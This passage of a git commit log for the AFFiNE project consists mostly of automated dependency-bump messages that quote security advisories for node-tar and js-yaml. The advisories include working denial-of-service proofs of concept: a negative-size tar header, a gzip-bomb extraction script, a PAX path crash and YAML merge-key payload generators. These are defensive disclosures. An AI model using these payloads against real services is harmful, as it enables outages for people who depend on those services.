| Python `tarfile.list()` | Lists `visible.txt\x00hidden.txt` (raw) |
| node-tar `tar.t({file})` | Emits raw NUL-bearing path (no crash) |
| node-tar `tar.x({file})` | **Crashes** (uncaught throw) |

A pre-flight validator using GNU tar or bsdtar will see a benign
filename; the subsequent node-tar extraction blows up. This is
exploitable against any architecture that
lists-and-validates-then-extracts.

---

##### Suggested patch

Match the long-name handler in `parse.ts` — strip everything from the
first NUL onward in `parseKVLine` value parsing:

```diff
--- a/src/pax.ts
+++ b/src/pax.ts
@&#8203;@&#8203; -173,7 +173,7 @&#8203;@&#8203; const parseKVLine = (set: Record<string, unknown>, line: string) => {

   const k = r.replace(/^SCHILY\.(dev|ino|nlink)/, '$1')

-  const v = kv.join('=')
+  const v = kv.join('=').replace(/\0.*$/, '')
   set[k] =
     /^([A-Z]+\.)?([mac]|birth|creation)time$/.test(k) ?
       new Date(Number(v) * 1000)
```

This matches `src/parse.ts:379` and `src/parse.ts:386` and closes both
`path` and `linkpath` sinks in one change.

A defense-in-depth follow-up: add an explicit
`assert(!v.includes('\0'))` (or fail-soft `return set`) at the top of
`parseKVLine` so malformed PAX records that *aren't* path/linkpath also
can't smuggle NUL into other unanticipated consumers (e.g. third-party
readers of `entry.header.atime` Date objects constructed from
`Number(v)` where `v` had embedded NUL).

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
-
[https://github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-gvwx-54wh-qm9j)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59875](https://nvd.nist.gov/vuln/detail/CVE-2026-59875)
-
[https://github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3](https://redirect.github.com/isaacs/node-tar/commit/7a635c29f5edbf083557374d43984273ecfed5b3)
-
[https://github.com/isaacs/node-tar/releases/tag/v7.5.17](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.17)
-
[https://github.com/advisories/GHSA-gvwx-54wh-qm9j](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gvwx-54wh-qm9j)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### node-tar: Negative tar entry size causes infinite loop in archive
replace
[CVE-2026-59874](https://nvd.nist.gov/vuln/detail/CVE-2026-59874) /
[GHSA-8x88-c5mf-7j5w](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w)

<details>
<summary>More information</summary>

#### Details
##### Summary

A checksum-valid tar archive with a negative base-256 encoded entry size
can make `tar.replace()` loop forever while scanning the existing
archive. Applications that update attacker-controlled tar archives can
have a worker process pinned indefinitely, causing denial of service.

##### Details

The public `tar.replace()` API scans the existing archive before
appending replacement entries. During this scan, it parses each tar
header and advances the archive position by the parsed entry size
rounded to a 512-byte block boundary.

Tar supports base-256 encoded numeric fields. A crafted header can
encode the entry size as `-512` while still carrying a valid checksum.
The replace scan accepts that parsed negative size and uses it in the
position-advance calculation.

For a size of `-512`, the computed body skip is `-512`. The scan then
adds the normal 512-byte header step, resulting in no net progress. The
scanner repeatedly parses the same header forever and never reaches the
append step.

This is reachable through the supported package API when the existing
archive file is attacker controlled. It does not rely on extraction,
dependency behavior, or an uncaught exception.

##### PoC

Save as `poc.mjs` in a project with the vulnerable package installed and
run:

```bash
node poc.mjs
```

```js
import fs from 'node:fs'
import os from 'node:os'
import path from 'node:path'
import { spawnSync } from 'node:child_process'

const oct = (b, n, off, len) =>
  b.write(n.toString(8).padStart(len - 1, '0') + '\0', off, len, 'ascii')

const badHeader = () => {
  const h = Buffer.alloc(512)

  h.write('x', 0)
  oct(h, 0o644, 100, 8)
  oct(h, 0, 108, 8)
  oct(h, 0, 116, 8)

  // base-256 encoded -512 in the size field
  Buffer.alloc(10, 0xff).copy(h, 124)
  h[134] = 0xfe
  h[135] = 0x00

  oct(h, 0, 136, 12)
  h.fill(0x20, 148, 156)
  h[156] = 0x30
  h.write('ustar\0' + '00', 257, 8, 'binary')

  let sum = 0
  for (const c of h) sum += c
  h.write(sum.toString(8).padStart(6, '0') + '\0 ', 148, 8, 'ascii')

  return h
}

const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'tar-loop-'))
const file = path.join(dir, 'poc.tar')

fs.writeFileSync(file, badHeader())
fs.writeFileSync(path.join(dir, 'add.txt'), 'x')

const r = spawnSync(
  process.execPath,
  [
    '--input-type=module',
    '-e',
    `
      import * as tar from 'tar'
      tar.replace({ file: ${JSON.stringify(file)}, cwd: ${JSON.stringify(dir)}, sync: true }, ['add.txt'])
      console.log('completed')
    `,
  ],
  { timeout: 20_000 }
)

console.log(r.error?.code === 'ETIMEDOUT')

// Output: true
```

##### Impact

An application that calls `tar.replace()` on an existing archive
supplied or controlled by an attacker can be forced into a
non-terminating archive scan. This can consume a worker process
indefinitely and cause denial of service. Plain extraction-only
workflows are not affected by this finding.

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/isaacs/node-tar/security/advisories/GHSA-8x88-c5mf-7j5w](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-8x88-c5mf-7j5w)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59874](https://nvd.nist.gov/vuln/detail/CVE-2026-59874)
-
[https://github.com/isaacs/node-tar/commit/9e78bf058b2c22dd4d52e00d8922d5c06fc2f7b5](https://redirect.github.com/isaacs/node-tar/commit/9e78bf058b2c22dd4d52e00d8922d5c06fc2f7b5)
-
[https://github.com/isaacs/node-tar/releases/tag/v7.5.18](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.18)
-
[https://github.com/advisories/GHSA-8x88-c5mf-7j5w](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-8x88-c5mf-7j5w)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### node-tar: Decompression/parse DoS via unlimited input
[CVE-2026-59873](https://nvd.nist.gov/vuln/detail/CVE-2026-59873) /
[GHSA-23hp-3jrh-7fpw](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw)

<details>
<summary>More information</summary>

#### Details
##### Summary
A **Decompression/parse DoS via unlimited input** vulnerability in
`node-tar` allows an attacker to exhaust server resources (disk space
and CPU). Because the library does not enforce hard upper bounds on
total decompressed data or entry counts, a small, maliciously crafted
"Gzip Bomb" can be used to fill a server's storage and crash services.

##### Details
The `node-tar` library does not enforce a hard upper bound on archive
size or the volume of decompressed data processed during extraction.
While the `maxReadSize` option exists, it only controls internal read
chunk sizes (default 16MB) and does not limit the total cumulative bytes
written to disk.

Specifically, in `src/extract.ts`, the `Unpack` stream processes entries
as they arrive. There is no total-bytes limit, entry-count limit, or
decompression ratio guard. An attacker can provide a TAR header claiming
a massive file size (e.g., 10GB) and follow it with highly compressible
data (like zeros). `node-tar` will continue to extract and write this
data until the physical disk is exhausted, as it lacks a mechanism to
abort based on global resource consumption.

##### PoC
The following Proof of Concept demonstrates how a tiny compressed input
can be expanded into gigabytes of data on the host machine almost
instantly.

1. Create the exploit script:
```javascript
const fs = require('fs'), z = require('zlib'), t = require('tar');

const d = 'dos_test';
if (fs.existsSync(d)) fs.rmSync(d, {recursive:true});
fs.mkdirSync(d);

// Build 10GB header
const h = Buffer.alloc(512);
h.write('payload');
h.write((10*1024**3).toString(8).padStart(11,'0'), 124); 
h.write('ustar', 257);
let s = 256;
for(let i=0;i<512;i++) if(i<148||i>155) s+=h[i];
h.write(s.toString(8).padStart(6,'0'), 148);

const gz = z.createGzip();
gz.pipe(t.x({cwd: d}));
gz.write(h);

const b = Buffer.alloc(32 * 1024 * 1024); // 32MB chunks for speed

const run = () => {
  while (gz.write(b));
  gz.once('drain', run);
};

const monitor = setInterval(() => {
    try {
        const bytes = fs.statSync(`${d}/payload`).size;
        const mb = Math.floor(bytes / (1024 * 1024));
        process.stdout.write(`\r[>] Extracted: ${mb} MB`);
        
        if (mb > 5000) { 
            console.log('\n[!] VULN CONFIRMED: 5GB+ written from tiny input.'); 
            process.exit(); 
        }
    } catch {}
}, 50);

process.on('exit', () => {
    clearInterval(monitor);
    console.log('[*] Cleaning up...');
    if (fs.existsSync(d)) fs.rmSync(d, {recursive:true, force:true});
});

run();
```

2. Run the PoC:
```bash
node poc.js
```

**Observation:** You will see the extracted size rapidly climb to 5,000
MB+ within seconds, while the actual data being "sent" through the gzip
stream is negligible.

##### Impact
This is a **Denial of Service (DoS)** vulnerability. It impacts any
application or service that uses `node-tar` to extract archives provided
by untrusted users (e.g., npm registries, CI/CD pipelines, or
file-sharing platforms). An unauthenticated attacker can send a small
payload that expands to consume all available disk space, leading to
system-wide failure and service outages.

#### Severity
- CVSS Score: 9.2 / 10 (Critical)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H`

#### References
-
[https://github.com/isaacs/node-tar/security/advisories/GHSA-23hp-3jrh-7fpw](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-23hp-3jrh-7fpw)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59873](https://nvd.nist.gov/vuln/detail/CVE-2026-59873)
-
[https://github.com/isaacs/node-tar/commit/2812e9338665659b183aa7226518c307044957d3](https://redirect.github.com/isaacs/node-tar/commit/2812e9338665659b183aa7226518c307044957d3)
-
[https://github.com/isaacs/node-tar/releases/tag/v7.5.19](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.19)
-
[https://github.com/advisories/GHSA-23hp-3jrh-7fpw](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-23hp-3jrh-7fpw)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### node-tar: Process crash via PAX numeric path type confusion
[CVE-2026-59871](https://nvd.nist.gov/vuln/detail/CVE-2026-59871) /
[GHSA-w8wr-v893-vjvp](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp)

<details>
<summary>More information</summary>

#### Details
##### Summary

A crafted 2.5KB tar archive crashes any Node.js process that extracts
it. The PAX header parser coerces all-digit path values to JavaScript
numbers, which causes an uncaught TypeError when downstream code calls
`.split('/')` on the numeric value. Error handlers and `strict: false`
cannot intercept the crash.

##### Details

In `pax.ts` line 180, `parseKV` converts PAX values matching
`/^[0-9]+$/` to numbers via `+v`. This applies to all fields including
`path` and `linkpath`. When a PAX header sets `path` to an all-digit
string like `"12345"`, the value becomes the number `12345`.

This number flows through Header -> ReadEntry -> Unpack.CHECKPATH, where
`normalizeWindowsPath(entry.path).split('/')` throws a TypeError because
numbers don't have `.split()`.

The throw is synchronous during event emission and bypasses all error
handling:
- `strict: false` does not help
- `'error'` event handlers do not catch it
- `'warn'` handlers do not catch it
- The TypeError propagates through the event emitter stack as an
uncaughtException

Directory, SymbolicLink, and Link type entries reach CHECKPATH and
crash. File type entries crash earlier in Header constructor at
`this.path.slice(-1)`, but that throw is caught and emitted as a warning
only.

##### PoC

Create a tar archive with a PAX extended header containing an all-digit
path:

```
PAX header body: "18 path=12345\n"
Entry type: Directory (type '5')
```

Extract it:
```js
const tar = require('tar');

// All of these crash with TypeError: t.split is not a function
tar.extract({ file: 'malicious.tar', cwd: '/tmp/test' });

// Error handlers don't help:
tar.extract({ file: 'malicious.tar', cwd: '/tmp/test', strict: false })
  .on('error', (err) => { /* never reached */ })
  .on('warn', (code, msg) => { /* never reached */ });
```

The archive is ~2.5KB. The crash is deterministic on every attempt.

##### Impact

Denial of service. Any application or tool that extracts untrusted tar
archives crashes from a single small file. This includes npm (which uses
node-tar to extract packages), CI/CD pipelines, file upload processors,
and backup tools. The crash cannot be caught by application-level error
handling.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
-
[https://github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp](https://redirect.github.com/isaacs/node-tar/security/advisories/GHSA-w8wr-v893-vjvp)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59871](https://nvd.nist.gov/vuln/detail/CVE-2026-59871)
-
[https://github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b](https://redirect.github.com/isaacs/node-tar/commit/e02a4e9e013c4be95302e2eb2047a942b883c27b)
-
[https://github.com/isaacs/node-tar/releases/tag/v7.5.18](https://redirect.github.com/isaacs/node-tar/releases/tag/v7.5.18)
-
[https://github.com/advisories/GHSA-w8wr-v893-vjvp](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-w8wr-v893-vjvp)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>isaacs/node-tar (tar)</summary>

###
[`v7.5.19`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.18...v7.5.19)

[Compare
Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.18...v7.5.19)

###
[`v7.5.18`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.17...v7.5.18)

[Compare
Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.17...v7.5.18)

###
[`v7.5.17`](https://redirect.github.com/isaacs/node-tar/compare/v7.5.16...v7.5.17)

[Compare
Source](https://redirect.github.com/isaacs/node-tar/compare/v7.5.16...v7.5.17)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-21 13:26:52 +08:00
renovate[bot] bd3fc7c78e chore: bump up js-yaml version to v4.3.0 [SECURITY] (#15298)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [js-yaml](https://redirect.github.com/nodeca/js-yaml) | [`4.2.0` →
`4.3.0`](https://renovatebot.com/diffs/npm/js-yaml/4.2.0/4.3.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/js-yaml/4.3.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/js-yaml/4.2.0/4.3.0?slim=true)
|

---

### JS-YAML: Quadratic-complexity DoS in merge key handling via repeated
aliases
[CVE-2026-53550](https://nvd.nist.gov/vuln/detail/CVE-2026-53550) /
[GHSA-h67p-54hq-rp68](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68)

<details>
<summary>More information</summary>

#### Details
##### Summary
A crafted YAML document can trigger algorithmic CPU exhaustion in
`js-yaml` merge-key processing (`<<`) by repeating the same alias many
times in a merge sequence.
This causes quadratic parse-time behavior relative to input size and can
block a Node.js worker/event loop for seconds with a relatively small
payload (tens of KB), resulting in denial of service.

##### Details
The issue is in merge handling inside `lib/loader.js`:

- `storeMappingPair(...)` iterates every element of a merge sequence
when key tag is `tag:yaml.org,2002:merge`.
- For each element, it calls `mergeMappings(...)`.
- `mergeMappings(...)` computes `Object.keys(source)` and performs
`_hasOwnProperty.call(destination, key)` checks for each key.

When input is of the form:

a: &a {k0:0, k1:0, ..., kK:0}
b: {<<: [*a, *a, *a, ... repeated M times ...]}
all *a entries refer to the same anchored object. After the first merge,
subsequent merges are semantically no-ops, but the parser still
reprocesses all keys each time.
Resulting work is O(K * M), while input size is O(K + M), giving
quadratic scaling as payload grows.
Relevant code path:
lib/loader.js in storeMappingPair(...) merge branch (keyTag ===
'tag:yaml.org,2002:merge')
lib/loader.js mergeMappings(...)

##### Root cause
File:       lib/loader.js
Function: storeMappingPair(state, _result, overridableKeys, keyTag,
keyNode,
valueNode, startLine, startLineStart, startPos)
Lines:      ~359-366

    if (keyTag === 'tag:yaml.org,2002:merge') {
      if (Array.isArray(valueNode)) {
for (index = 0, quantity = valueNode.length; index < quantity; index +=
1) {
mergeMappings(state, _result, valueNode[index], overridableKeys);
        }
      } else {
        mergeMappings(state, _result, valueNode, overridableKeys);
      }
    }

When the merge value is a sequence (YAML 1.1 <<: [ *a, *a, ... ]), each
element
is handed to mergeMappings() without deduplication. mergeMappings() then
does

    sourceKeys = Object.keys(source);
    for (index = 0; index < sourceKeys.length; index += 1) {
      key = sourceKeys[index];
      if (!_hasOwnProperty.call(destination, key)) {
        setProperty(destination, key, source[key]);
        overridableKeys[key] = true;
      }
    }

Every alias reference in the sequence resolves (by design) to the SAME
object
via state.anchorMap. After the first merge, every subsequent merge of
that same
reference is a pure no-op semantically, but still performs:

  * one Object.keys(source) call (O(K))
  * K _hasOwnProperty.call checks on the destination

Total: M * K hasOwnProperty checks + M Object.keys allocations, while
the final
object and all observable side effects are identical to a single merge.

YAML semantics for `<<:` are idempotent and commutative over duplicate
sources,
so collapsing duplicates preserves behavior exactly; this isn't a spec
trade-off.

##### PoC
Environment:
js-yaml version: 4.1.1
Node.js: v24.5.0
Platform: arm64 macOS (reproduced consistently)
Reproduction script:
Create many keys in one anchored map (&a).
Merge that same alias repeatedly via <<: [*a, *a, ...].
Measure parse time and compare with control payload using single merge
(<<: *a).
Observed repeated runs (same machine):
K=M=1000, input 9,909 bytes: ~33–36 ms
K=M=2000, input 20,909 bytes: ~121–123 ms
K=M=4000, input 42,909 bytes: ~524–537 ms
K=M=6000, input 64,909 bytes: ~1,608–1,829 ms
K=M=8000, input 86,909 bytes: ~3,395–3,565 ms
Control (single merge, similar key counts):
K=2000: ~1–2 ms
K=4000: ~3 ms
K=8000: ~5 ms
Also verified: repeated-merge output equals single-merge output (same
key count and same JSON), confirming excess time is redundant
computation.

##### Impact
This is a denial-of-service vulnerability (CPU exhaustion / algorithmic
complexity).
Any service parsing untrusted YAML with js-yaml can be impacted,
including API backends, CI tools, config processors, and automation
services. An attacker can submit crafted YAML to significantly increase
CPU time and reduce availability.

##### Suggested fix:
Dedupe the merge source list by reference before invoking mergeMappings.
Any of
the following are minimal and preserve YAML 1.1 merge semantics:

dedupe in storeMappingPair:

    if (keyTag === 'tag:yaml.org,2002:merge') {
      if (Array.isArray(valueNode)) {
        var seen = new Set();
for (index = 0, quantity = valueNode.length; index < quantity; index +=
1) {
          var src = valueNode[index];
if (seen.has(src)) continue; // idempotent; skip redundant alias
          seen.add(src);
          mergeMappings(state, _result, src, overridableKeys);
        }
      } else {
        mergeMappings(state, _result, valueNode, overridableKeys);
      }
    }

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
-
[https://github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-53550](https://nvd.nist.gov/vuln/detail/CVE-2026-53550)
-
[https://github.com/advisories/GHSA-h67p-54hq-rp68](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-h67p-54hq-rp68)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### js-yaml: YAML merge-key chains can force quadratic CPU consumption
[CVE-2026-59869](https://nvd.nist.gov/vuln/detail/CVE-2026-59869) /
[GHSA-52cp-r559-cp3m](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m)

<details>
<summary>More information</summary>

#### Details
##### Impact

js-yaml can spend quadratic CPU time parsing a document whose size grows
only linearly. The issue is triggered by a chain of mappings where each
mapping merges the previous one:

```yaml
a0: &a0 { k0: 0 }
a1: &a1 { <<: *a0, k1: 1 }
a2: &a2 { <<: *a1, k2: 2 }
a3: &a3 { <<: *a2, k3: 3 }
...
b: *aN
```

For each new mapping, the loader has to enumerate the keys inherited
from the previous mapping. With N chained mappings, this results in
roughly 1 + 2 + ... + N merged-key visits, i.e., O(N^2) work for O(N)
input size.

##### PoC

From N = 4000 delay become > 1s (doc size < 100K)

```js
import { performance } from 'node:perf_hooks'
import { Buffer } from 'node:buffer'
import { load, YAML11_SCHEMA } from 'js-yaml'

const n = Number(process.argv[2] || 4000)

function makeMergeChain (count) {
  const lines = ['a0: &a0 { k0: 0 }']

  for (let i = 1; i < count; i++) {
    lines.push(`a${i}: &a${i} { <<: *a${i - 1}, k${i}: ${i} }`)
  }

  lines.push(`b: *a${count - 1}`)
  return `${lines.join('\n')}\n`
}

const source = makeMergeChain(n)

console.log(source.split('\n').slice(0, 8).join('\n'))
console.log('...')
console.log(source.split('\n').slice(-4).join('\n'))
console.log()
console.log(`N: ${n}`)
console.log(`YAML size: ${Buffer.byteLength(source)} bytes`)

const started = performance.now()
const result = load(source, { schema: YAML11_SCHEMA })
const elapsed = performance.now() - started

console.log(`parse time: ${elapsed.toFixed(1)} ms`)
console.log(`top-level keys: ${Object.keys(result).length}`)
console.log(`b keys: ${Object.keys(result.b).length}`)
```

##### Patches

Fix released. The most robust protection is to limit the total number of
merged keys per parse call. This should close all past and future edge
cases with merge. The default 10K-key limit should be okay in most
cases.

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m](https://redirect.github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-59869](https://nvd.nist.gov/vuln/detail/CVE-2026-59869)
-
[https://github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7](https://redirect.github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7)
-
[https://github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4](https://redirect.github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4)
-
[https://github.com/nodeca/js-yaml/releases/tag/3.15.0](https://redirect.github.com/nodeca/js-yaml/releases/tag/3.15.0)
-
[https://github.com/nodeca/js-yaml/releases/tag/4.3.0](https://redirect.github.com/nodeca/js-yaml/releases/tag/4.3.0)
-
[https://github.com/advisories/GHSA-52cp-r559-cp3m](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-52cp-r559-cp3m)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodeca/js-yaml (js-yaml)</summary>

###
[`v4.3.0`](https://redirect.github.com/nodeca/js-yaml/compare/4.2.0...33d05b5d29a8c21360f620f7e1c1706e24522eda)

[Compare
Source](https://redirect.github.com/nodeca/js-yaml/compare/4.2.0...4.3.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNzIuNCIsInVwZGF0ZWRJblZlciI6IjQzLjI3Mi40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-21 13:26:30 +08:00
DarkSky b1abd8db54 fix(core): selfhosted auth handling (#15295)
fix #15284
fix #15266
fix #15268
fix #15267

#### PR Dependency Tree


* **PR #15295** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-07-21 11:26:15 +08:00
DarkSky bb55d6fd21 feat(server): impl doc gc (#15282)
#### PR Dependency Tree


* **PR #15282** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added automated document cleanup to reconcile missing workspace docs,
delete related stored data, and recover if the doc returns.
* Added effect-based follow-up reconciliation for search indexing,
Copilot embeddings, and comment attachment cleanup with explicit
acknowledgements.
* **Bug Fixes**
* Deleted-document references now persist as dangling references rather
than disappearing.
* Improved document deletion flow to enforce permissions and ensure
authorized deletions succeed.
* **Tests**
* Expanded coverage for cleanup recovery, indexing/embedding
reconciliation, permissions, and reference semantics.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v2026.7.20-canary.1002
2026-07-20 15:29:23 +08:00
DarkSky 81df4751a3 fix(server): blob gc (#15280)
#### PR Dependency Tree


* **PR #15280** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved workspace document discovery so documents in trashed pages
are correctly included when loading workspace content.
* Fixed dragging collections into Favorites, including reordering
collections within Favorites.
* **Tests**
* Added coverage for document projection behavior and collection
drag-and-drop interactions.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
v0.27.2-beta.1 v0.27.2
2026-07-19 16:49:41 +08:00
renovate[bot] 9122cfd108 chore: bump up Node.js to v22.23.1 (#15277)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.23.0`
→ `22.23.1` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.23.1`](https://redirect.github.com/nodejs/node/releases/tag/v22.23.1):
2026-06-23, Version 22.23.1 'Jod' (LTS), @&#8203;RafaelGSS

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.23.0...v22.23.1)

This release includes a fix for an unexpected behavior introduced
by the recent security release (22.23.0).

##### Commits

-
\[[`41d2ee13be`](https://redirect.github.com/nodejs/node/commit/41d2ee13be)]
- **build**: switch coverage-windows to `windows-2022` (Richard Lau)
[#&#8203;63940](https://redirect.github.com/nodejs/node/pull/63940)
-
\[[`eaa292549e`](https://redirect.github.com/nodejs/node/commit/eaa292549e)]
- **http**: avoid stream listeners on idle agent sockets (Matteo
Collina)
[#&#8203;64004](https://redirect.github.com/nodejs/node/pull/64004)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yNjUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjI2NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-07-19 15:13:33 +08:00
DarkSky d24c17f300 feat(core): improve auth handling (#15271)
fix #15270
fix #15260
fix #15257


#### PR Dependency Tree


* **PR #15271** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
v0.27.2-beta.0
2026-07-18 06:27:01 +08:00
DarkSky 427db39862 chore: update docs 2026-07-15 13:25:57 +08:00
DarkSky 0c7be44499 chore: cleanup logs v0.27.1 2026-07-15 12:42:07 +08:00
DarkSky a6b00a93c0 fix(server): mcp api visibility (#15247)
fix #15246


#### PR Dependency Tree


* **PR #15247** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
